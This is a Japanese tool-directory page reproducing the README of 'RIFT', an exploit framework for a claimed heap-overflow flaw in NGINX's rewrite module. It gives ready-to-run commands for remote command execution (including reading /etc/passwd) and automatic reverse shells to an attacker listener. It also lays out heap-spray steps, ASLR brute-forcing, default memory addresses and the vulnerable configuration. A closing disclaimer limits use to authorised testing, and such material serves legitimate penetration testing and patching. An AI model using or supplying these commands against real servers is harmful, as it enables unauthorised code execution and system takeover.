Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-42945 — NGINX、特にngx_http_rewrite_moduleに欠陥が見つかりました。認証されていない攻撃者が、特定のリライト設定下で細工したHTTPリクエストを送信することにより、この脆弱性を悪用する可能性があります。これにより、NGINXワーカープロセスでヒープバッファオーバーフローが発生し、任意のコード実行につながる可能性があります。 | Kitploit
ツール/GitHubGitHub/aratane/cve-2026-42945
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育ペイロード開発バイナリエクスプロイト
GitHubaratane/cve-2026-42945

CVE-2026-42945

NGINX、特にngx_http_rewrite_moduleに欠陥が見つかりました。認証されていない攻撃者が、特定のリライト設定下で細工したHTTPリクエストを送信することにより、この脆弱性を悪用する可能性があります。これにより、NGINXワーカープロセスでヒープバッファオーバーフローが発生し、任意のコード実行につながる可能性があります。

132ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

RIFT — リモートインジェクション&フォールトトリガー

著者: Michael Sanji Winaya Prawiradibrata
AI共著者: Varanus — わが友

NGINXのngx_http_rewrite_moduleを標的としたヒープバッファオーバーフローエクスプロイトフレームワーク。
偵察+エクスプロイトを1つのツールに。外部依存ゼロ。


リポジトリの内容

ファイル説明
rift.pyメインツール。 偵察+エクスプロイトを1つのスクリプトに統合(1026行)。
README.md本ドキュメント。

必要環境

  • Python 3.6+(標準ライブラリのみ — pip不要、venv不要、依存関係なし)

クイックスタート

root@kitploit:~
# 1. フル偵察 — バージョン、エンドポイント、脆弱性、戦略を検出
python3 rift.py --target 10.10.10.10 --recon

# 2. 偵察+エクスプロイトを一気に実行
python3 rift.py --target 10.10.10.10 --auto --cmd "id"

# 3. コマンド実行
python3 rift.py --target 10.10.10.10 --cmd "whoami"

# 4. リバースシェル(リスナーを自動オープン)
python3 rift.py --target 10.10.10.10 --shell --lhost 10.10.14.5 --lport 4444

# 5. bash を使うリバースシェル(python の代わり)
python3 rift.py --target 10.10.10.10 --shell --shell-type bash --lhost 10.10.14.5 --lport 4444

# 6. 脆弱性チェックのみ
python3 rift.py --target 10.10.10.10 --check-only

全フラグ

使用モード

エクスプロイトオプション

偵察オプション


主な機能

✅ 自動リバースシェル

--shell を使用すると、スクリプトが自動的に:

  1. --shell-type に応じたリバースシェルペイロードを生成
  2. --lport でリスナーをオープン
  3. エクスプロイトを送信
  4. ワーカーがクラッシュすると → シェルが接続
  5. 自動リスナー: netcat(nc -lvnp)を優先し、Pythonリスナーにフォールバック

✅ 自動ASLRブルートフォース

デフォルトアドレスが失敗した場合、スクリプトはヒープベースを±5ステップ×0x10000ずつ自動的にずらして、適合するアドレスを探します。手動設定は不要です。

✅ マルチペイロードリバースシェル

4種類のシェルペイロード — python、bash、nc、php。ターゲットで利用可能なものを選択します。

✅ フル偵察

--recon は5つのフェーズを実行します:

  1. フィンガープリント — NGINXのバージョン、一般的なエンドポイント15個、リライトモジュールを検出
  2. 情報漏えい — エラーページのメモリアドレス、タイミングサイドチャネル
  3. エンドポイントテスト — 6種類のペイロードに対するエンドポイントの挙動
  4. ワーカー数 — レイテンシパターンからワーカープロセス数を推定
  5. 戦略 — 分析結果に基づくアクションの推奨

✅ JSON出力

--output json は他のツールとの統合や自動解析用です。


脆弱な構成

エクスプロイトの対象は、次のような rewrite + set 構成のNGINXです:

root@kitploit:~
location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;  # is_args = 1
    set $original_endpoint $1;                     # length calc pake is_args = 0
}

結果として、割り当てられるバッファが小さすぎるため、URIエスケープ(3倍展開)でオーバーフローします。

影響を受けるバージョン

  • NGINX Open Source: 0.6.27 – 1.30.0
  • NGINX Plus: R32 – R36
  • 修正済み: 1.31.0, 1.30.1, R36 P4+, R35 P2+, R32 P6+

エクスプロイトの動作原理

root@kitploit:~
1. HEAP SPRAY ─── POST /spray × 20 → tanam fake ngx_pool_cleanup_s di heap
2. TRIGGER ────── GET /api/AAAA...++++... → overflow via URI escaping
3. CORRUPT ────── Overflow tulis ulang cleanup pointer pool adjacent
4. EXEC ───────── Pool destroyed → panggil system("command")

重要な定数(rift.py で変更可能)


完全な使用例

コマンド実行+詳細出力

root@kitploit:~
python3 rift.py --target 10.10.10.10 --cmd "cat /etc/passwd" --verbose

カスタムアドレス(ASLRバイパス)

root@kitploit:~
python3 rift.py --target 10.10.10.10 \
    --cmd "id" \
    --heap-base 0x555555659000 \
    --libc-base 0x7ffff77ba000

試行回数を増やす

root@kitploit:~
python3 rift.py --target 10.10.10.10 --cmd "id" --tries 50

偵察+JSON

root@kitploit:~
python3 rift.py --target 10.10.10.10 --recon --output json

エクスプロイトスクリプトを生成

root@kitploit:~
python3 rift.py --target 10.10.10.10 --generate-exploit
# → exploit_10_10_10_10.py

トラブルシューティング

「ターゲットがNGINXを実行しているように見えません」

  • ポートを確認:nc -zv <IP> 80
  • 別のポートを試す:--port 8080、--port 443
  • WAF/プロキシの背後にある可能性があります

「すべてのエクスプロイト試行が失敗しました」

  1. ASLRが有効な可能性があります — 自動ASLRスライディングには--autoを試してください
  2. NGINXのバージョンがパッチ済みの可能性があります(> 1.30.1)
  3. NGINXの構成が脆弱でない可能性があります(rewrite+setを使用していない)
  4. --verboseで各試行の詳細を確認してください

シェルが接続しない

  • ローカルファイアウォールを確認:sudo ufw allow 4444
  • --lhost を確認 — ローカルIPが正しいことを確認
  • --shell-type bash または --shell-type nc を試す

免責事項

教育目的および許可されたセキュリティテストのみを目的として作成されています。
無許可でシステムに対して使用することは違法です。

© 2026 Michael Sanji Winaya Prawiradibrata
AI共著者:Varanus

ツールをダウンロード
フラグ機能
--reconフル偵察。 フィンガープリント → 情報漏えい → エンドポイントテスト → ワーカー数 → 戦略。
--auto偵察+自動エクスプロイト。 --recon と同じ動作の後、エクスプロイトを続行。
--check-onlyクイックチェック。 NGINX、バージョン、エンドポイント/api/を検出。
--cmd "command"system() を介して1つのコマンドを実行。
--shellリバースシェル — リスナーを自動的に開き、ペイロードを送信し、接続を受け取る。
フラグデフォルト機能
--port80ターゲットのポート
--lhost—リバースシェル用のローカルIP(--shell使用時は必須)
--lport4444リスナー用のローカルポート
--shell-typepythonリバースシェルのペイロード:python、bash、nc、php
--heap-base0x555555659000ヒープのベースアドレス(ASLRバイパス用に上書き)
--libc-base0x7ffff77ba000libc のベースアドレス
--tries10候補アドレスごとの試行回数
--verbose / -v—試行ごとの詳細を出力
フラグ機能
--fingerprintNGINXのバージョン、エンドポイント、リライトモジュールを検出
--leak情報漏えいをチェック(エラーページのメモリアドレス、タイミング)
--test-endpointさまざまなペイロードでエンドポイントの挙動をテスト
--endpointテスト対象のエンドポイントパス(デフォルト:/api/)
--generate-exploitターゲットアドレスを指定した専用エクスプロイトスクリプトを生成
--output jsonターミナル出力と同時にJSON出力(機械可読)
定数デフォルト意味
BODY_LEN4000スプレー本体のサイズ(バイト)
N_SPRAY20試行ごとのPOSTリクエスト数
LIBC_SYSTEM_OFFSETS7 entries各ディストリビューション向けのsystem()オフセット
PREREAD_HEAP_OFFSETS19 entriesヒープオフセットの候補
DEFAULT_HEAP_BASE0x555555659000ヒープベース(ASLRオフ)
DEFAULT_LIBC_BASE0x7ffff77ba000libcベース(ASLRオフ)